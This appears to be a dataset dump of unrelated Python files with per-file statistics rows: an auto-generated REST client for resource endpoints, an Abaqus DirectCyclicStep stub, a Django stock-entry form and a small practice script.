async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_resources_using_get(self, page_size, page, **kwargs): # noqa: E501
"""Get Resource Infos (getResources) # noqa: E501
Returns a page of Resource Info objects owned by tenant or sysadmin. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Resource Info is a lightweight object that includes main information about the Resource excluding the heavyweight data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resources_using_get(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str text_search: The case insensitive 'startsWith' filter based on the resource title.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataTbResourceInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_resources_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_resources_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
return data
def get_resources_using_get_with_http_info(self, page_size, page, **kwargs): # noqa: E501
"""Get Resource Infos (getResources) # noqa: E501
Returns a page of Resource Info objects owned by tenant or sysadmin. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Resource Info is a lightweight object that includes main information about the Resource excluding the heavyweight data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resources_using_get_with_http_info(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str text_search: The case insensitive 'startsWith' filter based on the resource title.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataTbResourceInfo
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_resources_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_resources_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_resources_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource{?page,pageSize,sortOrder,sortProperty,textSearch}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataTbResourceInfo', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def save_resource_using_post(self, **kwargs): # noqa: E501
"""Create Or Update Resource (saveResource) # noqa: E501
Create or update the Resource. When creating the Resource, platform generates Resource id as [time-based UUID](https://en.wikipedia.org/wiki/Universally_unique_identifier#Version_1_(date-time_and_MAC_address)). The newly created Resource id will be present in the response. Specify existing Resource id to update the Resource. Referencing non-existing Resource Id will cause 'Not Found' error. Resource combination of the title with the key is unique in the scope of tenant. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.save_resource_using_post(async_req=True)
>>> result = thread.get()
:param async_req bool
:param TbResource body:
:return: TbResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.save_resource_using_post_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.save_resource_using_post_with_http_info(**kwargs) # noqa: E501
return data
def save_resource_using_post_with_http_info(self, **kwargs): # noqa: E501
"""Create Or Update Resource (saveResource) # noqa: E501
Create or update the Resource. When creating the Resource, platform generates Resource id as [time-based UUID](https://en.wikipedia.org/wiki/Universally_unique_identifier#Version_1_(date-time_and_MAC_address)). The newly created Resource id will be present in the response. Specify existing Resource id to update the Resource. Referencing non-existing Resource Id will cause 'Not Found' error. Resource combination of the title with the key is unique in the scope of tenant. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.save_resource_using_post_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param TbResource body:
:return: TbResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method save_resource_using_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TbResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 48.529412
| 566
| 0.651442
| 5,070
| 41,250
| 5.061341
| 0.057594
| 0.039593
| 0.017458
| 0.022447
| 0.964343
| 0.956705
| 0.951872
| 0.943221
| 0.940026
| 0.934726
| 0
| 0.020787
| 0.266424
| 41,250
| 849
| 567
| 48.586572
| 0.827231
| 0.426327
| 0
| 0.796053
| 0
| 0
| 0.21159
| 0.066285
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037281
| false
| 0
| 0.008772
| 0
| 0.100877
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83c73940406bc5cab5fe7665f127a6606f11ba4c
| 27,672
|
py
|
Python
|
src/abaqus/Step/DirectCyclicStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/Step/DirectCyclicStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/Step/DirectCyclicStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
from abaqusConstants import *
from .AnalysisStep import AnalysisStep
from ..Adaptivity.AdaptiveMeshConstraintState import AdaptiveMeshConstraintState
from ..Adaptivity.AdaptiveMeshDomain import AdaptiveMeshDomain
from ..BoundaryCondition.BoundaryConditionState import BoundaryConditionState
from ..Load.LoadCase import LoadCase
from ..Load.LoadState import LoadState
from ..PredefinedField.PredefinedFieldState import PredefinedFieldState
from ..StepMiscellaneous.Control import Control
from ..StepMiscellaneous.SolverControl import SolverControl
from ..StepOutput.DiagnosticPrint import DiagnosticPrint
from ..StepOutput.FieldOutputRequestState import FieldOutputRequestState
from ..StepOutput.HistoryOutputRequestState import HistoryOutputRequestState
from ..StepOutput.Monitor import Monitor
from ..StepOutput.Restart import Restart
class DirectCyclicStep(AnalysisStep):
"""The DirectCyclicStep object is used to provide a direct cyclic procedure for nonlinear,
non-isothermal quasi-static analysis. It can also be used to predict progressive damage
and failure for ductile bulk materials and/or to predict delamination/debonding growth
at the interfaces in laminated composites in a low-cycle fatigue analysis.
The DirectCyclicStep object is derived from the AnalysisStep object.
Attributes
----------
name: str
A String specifying the repository key.
timePeriod: float
A Float specifying the time of single loading cycle. The default value is 1.0.
timeIncrementationMethod: SymbolicConstant
A SymbolicConstant specifying the time incrementation method to be used. Possible values
are FIXED and AUTOMATIC. The default value is AUTOMATIC.
maxNumInc: int
An Int specifying the maximum number of increments in a step. The default value is 100.
initialInc: float
A Float specifying the initial time increment. The default value is the total time
period for the step.
minInc: float
A Float specifying the minimum time increment allowed. The default value is the smaller
of the suggested initial time increment or 10−5 times the total time period.
maxInc: float
A Float specifying the maximum time increment allowed. The default value is the total
time period for the step.
maxNumIterations: int
An Int specifying the maximum number of iterations in a step. The default value is 200.
initialTerms: int
An Int specifying the initial number of terms in the Fourier series. The default value
is 11.
maxTerms: int
An Int specifying the maximum number of terms in the Fourier series. The default value
is 25.
termsIncrement: int
An Int specifying the increment in number of terms in the Fourier series. The default
value is 5.
deltmx: float
A Float specifying the maximum temperature change to be allowed in an increment. The
default value is 0.0.
cetol: float
A Float specifying the maximum difference in the creep strain increment calculated from
the creep strain rates at the beginning and end of the increment. The default value is
0.0.
fatigue: Boolean
A Boolean specifying whether to include low-cycle fatigue analysis. The default value is
OFF.
continueAnalysis: Boolean
A Boolean specifying whether the displacement solution in the Fourier series obtained in
the previous direct cyclic step is used as the starting values for the current step. The
default value is OFF.
minCycleInc: int
An Int specifying the minimum number of cycles over which the damage is extrapolated
forward. The default value is 100.
maxCycleInc: int
An Int specifying the maximum number of cycles over which the damage is extrapolated
forward. The default value is 1000.
maxNumCycles: SymbolicConstant
The SymbolicConstant DEFAULT or an Int specifying the maximum number of cycles allowed
in a step or DEFAULT. A value of 1 plus half of the maximum number of cycles will be
used if DEFAULT is specified. The default value is DEFAULT.
damageExtrapolationTolerance: float
A Float specifying the maximum extrapolated damage increment. The default value is 1.0.
matrixStorage: SymbolicConstant
A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
extrapolation: SymbolicConstant
A SymbolicConstant specifying the type of extrapolation to use in determining the
incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
PARABOLIC. The default value is LINEAR.
convertSDI: SymbolicConstant
A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
CONVERT_SDI_ON. The default value is PROPAGATED.
previous: str
A String specifying the name of the previous step. The new step appears after this step
in the list of analysis steps.
description: str
A String specifying a description of the new step. The default value is an empty string.
timePoints: str
None or a String specifying a String specifying the name of a time :py:class:`~.point` object used to
determine at which times the response of the structure will be evaluated. The default
value is NONE.
explicit: SymbolicConstant
A SymbolicConstant specifying whether the step has an explicit procedure type
(**procedureType=ANNEAL**, DYNAMIC_EXPLICIT, or DYNAMIC_TEMP_DISPLACEMENT).
perturbation: Boolean
A Boolean specifying whether the step has a perturbation procedure type.
nonmechanical: Boolean
A Boolean specifying whether the step has a mechanical procedure type.
procedureType: SymbolicConstant
A SymbolicConstant specifying the Abaqus procedure. Possible values are:
- ANNEAL
- BUCKLE
- COMPLEX_FREQUENCY
- COUPLED_TEMP_DISPLACEMENT
- COUPLED_THERMAL_ELECTRIC
- DIRECT_CYCLIC
- DYNAMIC_IMPLICIT
- DYNAMIC_EXPLICIT
- DYNAMIC_SUBSPACE
- DYNAMIC_TEMP_DISPLACEMENT
- COUPLED_THERMAL_ELECTRICAL_STRUCTURAL
- FREQUENCY
- GEOSTATIC
- HEAT_TRANSFER
- MASS_DIFFUSION
- MODAL_DYNAMICS
- RANDOM_RESPONSE
- RESPONSE_SPECTRUM
- SOILS
- STATIC_GENERAL
- STATIC_LINEAR_PERTURBATION
- STATIC_RIKS
- STEADY_STATE_DIRECT
- STEADY_STATE_MODAL
- STEADY_STATE_SUBSPACE
- VISCO
suppressed: Boolean
A Boolean specifying whether the step is suppressed or not. The default value is OFF.
fieldOutputRequestState: dict[str, FieldOutputRequestState]
A repository of :py:class:`~abaqus.StepOutput.FieldOutputRequestState.FieldOutputRequestState` objects.
historyOutputRequestState: dict[str, HistoryOutputRequestState]
A repository of :py:class:`~abaqus.StepOutput.HistoryOutputRequestState.HistoryOutputRequestState` objects.
diagnosticPrint: DiagnosticPrint
A :py:class:`~abaqus.StepOutput.DiagnosticPrint.DiagnosticPrint` object.
monitor: Monitor
A :py:class:`~abaqus.StepOutput.Monitor.Monitor` object.
restart: Restart
A :py:class:`~abaqus.StepOutput.Restart.Restart` object.
adaptiveMeshConstraintStates: dict[str, AdaptiveMeshConstraintState]
A repository of :py:class:`~abaqus.Adaptivity.AdaptiveMeshConstraintState.AdaptiveMeshConstraintState` objects.
adaptiveMeshDomains: dict[str, AdaptiveMeshDomain]
A repository of :py:class:`~abaqus.Adaptivity.AdaptiveMeshDomain.AdaptiveMeshDomain` objects.
control: Control
A :py:class:`~abaqus.StepMiscellaneous.Control.Control` object.
solverControl: SolverControl
A :py:class:`~abaqus.StepMiscellaneous.SolverControl.SolverControl` object.
boundaryConditionStates: dict[str, BoundaryConditionState]
A repository of :py:class:`~abaqus.BoundaryCondition.BoundaryConditionState.BoundaryConditionState` objects.
interactionStates: int
A repository of :py:class:`~abaqus.Interaction.InteractionState.InteractionState` objects.
loadStates: dict[str, LoadState]
A repository of :py:class:`~abaqus.Load.LoadState.LoadState` objects.
loadCases: dict[str, LoadCase]
A repository of :py:class:`~abaqus.Load.LoadCase.LoadCase` objects.
predefinedFieldStates: dict[str, PredefinedFieldState]
A repository of :py:class:`~abaqus.PredefinedField.PredefinedFieldState.PredefinedFieldState` objects.
Notes
-----
This object can be accessed by:
.. code-block:: python
import step
mdb.models[name].steps[name]
The corresponding analysis keywords are:
- DIRECT CYCLIC
- STEP
"""
# Repository key for this step.
name: str = ''
# Time of a single loading cycle. Default 1.0.
timePeriod: float = 1
# Time incrementation method: FIXED or AUTOMATIC. Default AUTOMATIC.
timeIncrementationMethod: SymbolicConstant = AUTOMATIC
# Maximum number of increments in a step. Default 100.
maxNumInc: int = 100
# Initial time increment; defaults to the step's total time period.
initialInc: float = None
# Minimum time increment allowed; default is the smaller of the suggested
# initial increment or 1e-5 times the total time period.
minInc: float = None
# Maximum time increment allowed; defaults to the step's total time period.
maxInc: float = None
# Maximum number of iterations in a step. Default 200.
maxNumIterations: int = 200
# Initial number of terms in the Fourier series. Default 11.
initialTerms: int = 11
# Maximum number of terms in the Fourier series. Default 25.
maxTerms: int = 25
# Increment in the number of Fourier series terms. Default 5.
termsIncrement: int = 5
# Maximum temperature change allowed in an increment. Default 0.0.
deltmx: float = 0
# Maximum difference in the creep strain increment computed from the creep
# strain rates at the beginning and end of the increment. Default 0.0.
cetol: float = 0
# Whether to include low-cycle fatigue analysis. Default OFF.
fatigue: Boolean = OFF
# Whether the Fourier displacement solution of the previous direct cyclic
# step seeds the current step. Default OFF.
continueAnalysis: Boolean = OFF
# Minimum number of cycles over which damage is extrapolated forward. Default 100.
minCycleInc: int = 100
# Maximum number of cycles over which damage is extrapolated forward. Default 1000.
maxCycleInc: int = 1000
# DEFAULT or an Int limiting the cycles allowed in a step; DEFAULT means
# 1 plus half of the maximum number of cycles. Default DEFAULT.
maxNumCycles: SymbolicConstant = DEFAULT
# Maximum extrapolated damage increment. Default 1.0.
damageExtrapolationTolerance: float = 1
# Matrix storage: SYMMETRIC, UNSYMMETRIC or SOLVER_DEFAULT. Default SOLVER_DEFAULT.
matrixStorage: SymbolicConstant = SOLVER_DEFAULT
# Extrapolation of the incremental solution for a nonlinear analysis:
# NONE, LINEAR or PARABOLIC. Default LINEAR.
extrapolation: SymbolicConstant = LINEAR
# Severe-discontinuity iteration handling: PROPAGATED, CONVERT_SDI_OFF or
# CONVERT_SDI_ON. Default PROPAGATED.
convertSDI: SymbolicConstant = PROPAGATED
# Name of the previous step; the new step is inserted after it in the step list.
previous: str = ''
# Description of the new step. Default ''.
description: str = ''
# Name of the time-points object used to choose evaluation times, or NONE.
timePoints: str = NONE
# Set when the step has an explicit procedure type
# (procedureType = ANNEAL, DYNAMIC_EXPLICIT or DYNAMIC_TEMP_DISPLACEMENT).
explicit: SymbolicConstant = None
# Whether the step has a perturbation procedure type.
perturbation: Boolean = OFF
# Whether the step has a mechanical procedure type.
nonmechanical: Boolean = OFF
# The Abaqus procedure (e.g. DIRECT_CYCLIC, STATIC_GENERAL, FREQUENCY, ...).
procedureType: SymbolicConstant = None
# Whether the step is suppressed. Default OFF.
suppressed: Boolean = OFF
# Repository of FieldOutputRequestState objects, keyed by name.
fieldOutputRequestState: dict[str, FieldOutputRequestState] = {}
# Repository of HistoryOutputRequestState objects, keyed by name.
historyOutputRequestState: dict[str, HistoryOutputRequestState] = {}
# Diagnostic-print controls for this step.
diagnosticPrint: DiagnosticPrint = DiagnosticPrint()
# Degree-of-freedom monitor, if any.
monitor: Monitor = None
# Restart-request settings for this step.
restart: Restart = Restart()
# Repository of AdaptiveMeshConstraintState objects, keyed by name.
adaptiveMeshConstraintStates: dict[str, AdaptiveMeshConstraintState] = {}
# Repository of AdaptiveMeshDomain objects, keyed by name.
adaptiveMeshDomains: dict[str, AdaptiveMeshDomain] = {}
# Solution controls for this step.
control: Control = Control()
# Solver controls for this step.
solverControl: SolverControl = SolverControl()
# Repository of BoundaryConditionState objects, keyed by name.
boundaryConditionStates: dict[str, BoundaryConditionState] = {}
# Repository of InteractionState objects (annotated `int` in the original API).
interactionStates: int = None
# Repository of LoadState objects, keyed by name.
loadStates: dict[str, LoadState] = {}
# Repository of LoadCase objects, keyed by name.
loadCases: dict[str, LoadCase] = {}
# Repository of PredefinedFieldState objects, keyed by name.
predefinedFieldStates: dict[str, PredefinedFieldState] = {}
def __init__(self, name: str, previous: str, description: str = '', timePeriod: float = 1,
             timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
             initialInc: float = None, minInc: float = None, maxInc: float = None,
             maxNumIterations: int = 200, initialTerms: int = 11, maxTerms: int = 25,
             termsIncrement: int = 5, deltmx: float = 0, cetol: float = 0, timePoints: str = NONE,
             fatigue: Boolean = OFF, continueAnalysis: Boolean = OFF, minCycleInc: int = 100,
             maxCycleInc: int = 1000, maxNumCycles: SymbolicConstant = DEFAULT,
             damageExtrapolationTolerance: float = 1,
             matrixStorage: SymbolicConstant = SOLVER_DEFAULT,
             extrapolation: SymbolicConstant = LINEAR, maintainAttributes: Boolean = False,
             convertSDI: SymbolicConstant = PROPAGATED):
    """Create a DirectCyclicStep object.

    Notes
    -----
    This function can be accessed by:

    .. code-block:: python

        mdb.models[name].DirectCyclicStep

    Parameters
    ----------
    name
        A String specifying the repository key.
    previous
        Name of the previous step; the new step is inserted after it in the
        list of analysis steps.
    description
        A String describing the new step. Default is an empty string.
    timePeriod
        Time of a single loading cycle. Default 1.0.
    timeIncrementationMethod
        FIXED or AUTOMATIC. Default AUTOMATIC.
    maxNumInc
        Maximum number of increments in a step. Default 100.
    initialInc
        Initial time increment; defaults to the step's total time period.
    minInc
        Minimum time increment allowed; default is the smaller of the
        suggested initial increment or 1e-5 times the total time period.
    maxInc
        Maximum time increment allowed; defaults to the total time period.
    maxNumIterations
        Maximum number of iterations in a step. Default 200.
    initialTerms
        Initial number of terms in the Fourier series. Default 11.
    maxTerms
        Maximum number of terms in the Fourier series. Default 25.
    termsIncrement
        Increment in the number of Fourier series terms. Default 5.
    deltmx
        Maximum temperature change allowed in an increment. Default 0.0.
    cetol
        Maximum difference in the creep strain increment computed from the
        creep strain rates at the beginning and end of the increment.
        Default 0.0.
    timePoints
        Name of a time-points object used to choose the evaluation times,
        or NONE. Default NONE.
    fatigue
        Whether to include low-cycle fatigue analysis. Default OFF.
    continueAnalysis
        Whether the Fourier displacement solution of the previous direct
        cyclic step seeds the current step. Default OFF.
    minCycleInc
        Minimum number of cycles over which damage is extrapolated forward.
        Default 100.
    maxCycleInc
        Maximum number of cycles over which damage is extrapolated forward.
        Default 1000.
    maxNumCycles
        DEFAULT or an Int limiting the cycles allowed in a step; DEFAULT
        means 1 plus half of the maximum number of cycles. Default DEFAULT.
    damageExtrapolationTolerance
        Maximum extrapolated damage increment. Default 1.0.
    matrixStorage
        SYMMETRIC, UNSYMMETRIC or SOLVER_DEFAULT. Default SOLVER_DEFAULT.
    extrapolation
        Extrapolation for the incremental solution of a nonlinear analysis:
        NONE, LINEAR or PARABOLIC. Default LINEAR.
    maintainAttributes
        Whether to retain attributes from an existing step with the same
        name. Default False.
    convertSDI
        Severe-discontinuity handling: PROPAGATED, CONVERT_SDI_OFF or
        CONVERT_SDI_ON. Default PROPAGATED.

    Returns
    -------
    A DirectCyclicStep object.

    Raises
    ------
    RangeError
    """
    # Delegate to the base AnalysisStep initializer; this reproduced-API stub
    # has no body of its own.  (A redundant trailing `pass` was removed.)
    super().__init__()
def setValues(self, description: str = '', timePeriod: float = 1,
              timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
              initialInc: float = None, minInc: float = None, maxInc: float = None,
              maxNumIterations: int = 200, initialTerms: int = 11, maxTerms: int = 25,
              termsIncrement: int = 5, deltmx: float = 0, cetol: float = 0, timePoints: str = NONE,
              fatigue: Boolean = OFF, continueAnalysis: Boolean = OFF, minCycleInc: int = 100,
              maxCycleInc: int = 1000, maxNumCycles: SymbolicConstant = DEFAULT,
              damageExtrapolationTolerance: float = 1,
              matrixStorage: SymbolicConstant = SOLVER_DEFAULT,
              extrapolation: SymbolicConstant = LINEAR, convertSDI: SymbolicConstant = PROPAGATED):
    """Modify the DirectCyclicStep object.

    Accepts the same options as the constructor, minus *name*, *previous*
    and *maintainAttributes*.

    Parameters
    ----------
    description
        A String describing the step. Default is an empty string.
    timePeriod
        Time of a single loading cycle. Default 1.0.
    timeIncrementationMethod
        FIXED or AUTOMATIC. Default AUTOMATIC.
    maxNumInc
        Maximum number of increments in a step. Default 100.
    initialInc
        Initial time increment; defaults to the step's total time period.
    minInc
        Minimum time increment allowed; default is the smaller of the
        suggested initial increment or 1e-5 times the total time period.
    maxInc
        Maximum time increment allowed; defaults to the total time period.
    maxNumIterations
        Maximum number of iterations in a step. Default 200.
    initialTerms
        Initial number of terms in the Fourier series. Default 11.
    maxTerms
        Maximum number of terms in the Fourier series. Default 25.
    termsIncrement
        Increment in the number of Fourier series terms. Default 5.
    deltmx
        Maximum temperature change allowed in an increment. Default 0.0.
    cetol
        Maximum difference in the creep strain increment computed from the
        creep strain rates at the beginning and end of the increment.
        Default 0.0.
    timePoints
        Name of a time-points object used to choose the evaluation times,
        or NONE. Default NONE.
    fatigue
        Whether to include low-cycle fatigue analysis. Default OFF.
    continueAnalysis
        Whether the Fourier displacement solution of the previous direct
        cyclic step seeds the current step. Default OFF.
    minCycleInc
        Minimum number of cycles over which damage is extrapolated forward.
        Default 100.
    maxCycleInc
        Maximum number of cycles over which damage is extrapolated forward.
        Default 1000.
    maxNumCycles
        DEFAULT or an Int limiting the cycles allowed in a step; DEFAULT
        means 1 plus half of the maximum number of cycles. Default DEFAULT.
    damageExtrapolationTolerance
        Maximum extrapolated damage increment. Default 1.0.
    matrixStorage
        SYMMETRIC, UNSYMMETRIC or SOLVER_DEFAULT. Default SOLVER_DEFAULT.
    extrapolation
        Extrapolation for the incremental solution of a nonlinear analysis:
        NONE, LINEAR or PARABOLIC. Default LINEAR.
    convertSDI
        Severe-discontinuity handling: PROPAGATED, CONVERT_SDI_OFF or
        CONVERT_SDI_ON. Default PROPAGATED.

    Raises
    ------
    RangeError
    """
    pass
| 48.377622
| 119
| 0.691638
| 3,260
| 27,672
| 5.841718
| 0.086503
| 0.049884
| 0.074827
| 0.084804
| 0.810702
| 0.765228
| 0.740968
| 0.716184
| 0.713453
| 0.71193
| 0
| 0.009166
| 0.266659
| 27,672
| 571
| 120
| 48.462347
| 0.929089
| 0.735509
| 0
| 0.211765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023529
| false
| 0.023529
| 0.176471
| 0
| 0.729412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
83ce81529de513a89cfd68a87631c64a2bd34b7d
| 1,054
|
py
|
Python
|
stock/forms.py
|
WitnessEncrypter/rappsystems
|
15b81ae933a084180eab6637a20b748126eae0f9
|
[
"MIT"
] | null | null | null |
stock/forms.py
|
WitnessEncrypter/rappsystems
|
15b81ae933a084180eab6637a20b748126eae0f9
|
[
"MIT"
] | null | null | null |
stock/forms.py
|
WitnessEncrypter/rappsystems
|
15b81ae933a084180eab6637a20b748126eae0f9
|
[
"MIT"
] | null | null | null |
from django import forms
class AddStock(forms.Form):
    """Form for registering a new stock item.

    Every field is a 200-character text input rendered with the Bootstrap
    ``form-control`` class and a field-specific placeholder.
    """

    def _text(placeholder):
        # Class-body helper: builds one styled CharField.  It runs only while
        # the class body executes and is deleted below, so field creation
        # order (and therefore form rendering order) is unchanged.
        return forms.CharField(
            max_length=200,
            widget=forms.TextInput(
                attrs={'class': 'form-control', 'placeholder': placeholder}
            ),
        )

    stock_name = _text('Enter Stock Item Name')
    stock_category = _text('Enter Category')
    purchase_price = _text('Enter Stock Price')
    client_id = _text('Enter Client ID')
    stock_quantity = _text('Enter Stock Quantity')
    stock_unit = _text('Enter Stock Unit')
    selling_price_per_unit = _text('Enter Stock Selling Price')

    del _text
| 81.076923
| 157
| 0.760911
| 137
| 1,054
| 5.737226
| 0.211679
| 0.124682
| 0.151399
| 0.204835
| 0.78117
| 0.78117
| 0.78117
| 0.78117
| 0.78117
| 0.78117
| 0
| 0.021407
| 0.06926
| 1,054
| 12
| 158
| 87.833333
| 0.779817
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
793defadc47678235c765e7509f4204da95aa252
| 32
|
py
|
Python
|
python_practice/9.7 test 7.py
|
ccom33/python_practice
|
9a3551610c46b0bae15542575033e8ed7e967289
|
[
"MIT"
] | null | null | null |
python_practice/9.7 test 7.py
|
ccom33/python_practice
|
9a3551610c46b0bae15542575033e8ed7e967289
|
[
"MIT"
] | null | null | null |
python_practice/9.7 test 7.py
|
ccom33/python_practice
|
9a3551610c46b0bae15542575033e8ed7e967289
|
[
"MIT"
] | null | null | null |
# Practice snippet: augmented assignment is shorthand for the long form.
# Bug fix: `a` and `b` were never initialized, so the original script raised
# NameError on its first line; seed both so the demonstration actually runs.
a = 0
a = a + 1  # long form
a += 1     # equivalent augmented form
b = 10
b = b - 5  # long form
b -= 5     # equivalent augmented form
| 4.571429
| 7
| 0.3125
| 10
| 32
| 1
| 0.4
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 0.4375
| 32
| 6
| 8
| 5.333333
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f715bca80298b84ce5bd4435a0da66ffc75de251
| 19,652
|
py
|
Python
|
Bloxorz.py
|
ilkercankaya/Bloxorz
|
212e8f051329f4f7392e336b9a99d5c4ae78c019
|
[
"MIT"
] | null | null | null |
Bloxorz.py
|
ilkercankaya/Bloxorz
|
